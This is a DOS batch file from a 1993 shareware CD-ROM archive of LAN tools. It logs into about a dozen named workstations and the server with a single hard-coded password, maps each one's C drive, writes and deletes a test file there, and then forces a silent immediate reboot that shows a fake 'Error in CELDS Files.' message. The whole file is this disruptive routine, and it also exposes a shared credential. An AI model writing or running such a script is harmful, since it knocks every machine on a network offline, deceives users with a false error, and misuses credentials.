home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Technotools
/
Technotools (Chestnut CD-ROM)(1993).ISO
/
lantools
/
lanscrip
/
bartbt.bat
next >
Wrap
DOS Batch File
|
1991-03-14
|
4KB
|
140 lines
REM ************************** XMAGALI **************************************
@echo off
rem station xMAGALI
net/noerror logout XMAGALI
net/noerror login XMAGALI RRABIT
net/noerror use x: \\XMAGALI\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\XMAGALI 0 "Error in CELDS Files."
REM ************************** XHANS **************************************
@echo off
rem station XHANS
net/noerror logout XHANS
net/noerror login XHANS RRABIT
net/noerror use x: \\XHANS\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\XHANS 0 "Error in CELDS Files."
REM ************************** billy **************************************
@echo off
rem station billy
net/noerror logout billy
net/noerror login billy RRABIT
net/noerror use x: \\billy\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\billy 0 "Error in CELDS Files."
REM ************************** PATJE **************************************
@echo off
rem station PATJE
net/noerror logout PATJE
net/noerror login PATJE RRABIT
net/noerror use x: \\PATJE\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\PATJE 0 "Error in CELDS Files."
REM ************************** SERVER **************************************
@echo off
rem station SERVER
net/noerror logout SERVER
net/noerror login SERVER RRABIT
net/noerror use x: \\SERVER\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\SERVER 0 "Error in CELDS Files."
REM ************************** KRIS **************************************
@echo off
rem station KRIS
net/noerror logout KRIS
net/noerror login KRIS RRABIT
net/noerror use x: \\KRIS\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\KRIS 0 "Error in CELDS Files."
REM ************************** XYVES **************************************
@echo off
rem station XYVES
net/noerror logout XYVES
net/noerror login XYVES RRABIT
net/noerror use x: \\XYVES\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\XYVES 0 "Error in CELDS Files."
REM ************************** XGUIDO **************************************
@echo off
rem station XGUIDO
net/noerror logout XGUIDO
net/noerror login XGUIDO RRABIT
net/noerror use x: \\XGUIDO\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\XGUIDO 0 "Error in CELDS Files."
REM ************************** LUC **************************************
@echo off
rem station LUC
net/noerror logout LUC
net/noerror login LUC RRABIT
net/noerror use x: \\LUC\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\LUC 0 "Error in CELDS Files."
REM ************************** ALBERTO **************************************
@echo off
rem station ALBERTO
net/noerror logout ALBERTO
net/noerror login ALBERTO RRABIT
net/noerror use x: \\ALBERTO\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\ALBERTO 0 "Error in CELDS Files."
REM ************************** XDANIELLE **************************************
@echo off
rem station XDANIELLE
net/noerror logout XDANIELLE
net/noerror login XDANIELLE RRABIT
net/noerror use x: \\XDANIELLE\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\XDANIELLE 0 "Error in CELDS Files."
REM ************************** LUDO **************************************
@echo off
rem station LUDO
net/noerror logout LUDO
net/noerror login LUDO RRABIT
net/noerror use x: \\LUDO\c-drive
copy c:\autoexec.bat x:\x.txt >nul
erase x:\x.txt >nul
net shutdown/reboot/silent \\LUDO 0 "Error in CELDS Files."
rem ********************** eigen station *********************************
copy c:\config.sys c:\x.txt >nul
del c:\x.txt >nul
net/noerror logout xbart
net/noerror login xbart rrabit
net/noerror shutdown/reboot/silent \\server 0 "Error in CELDS Files."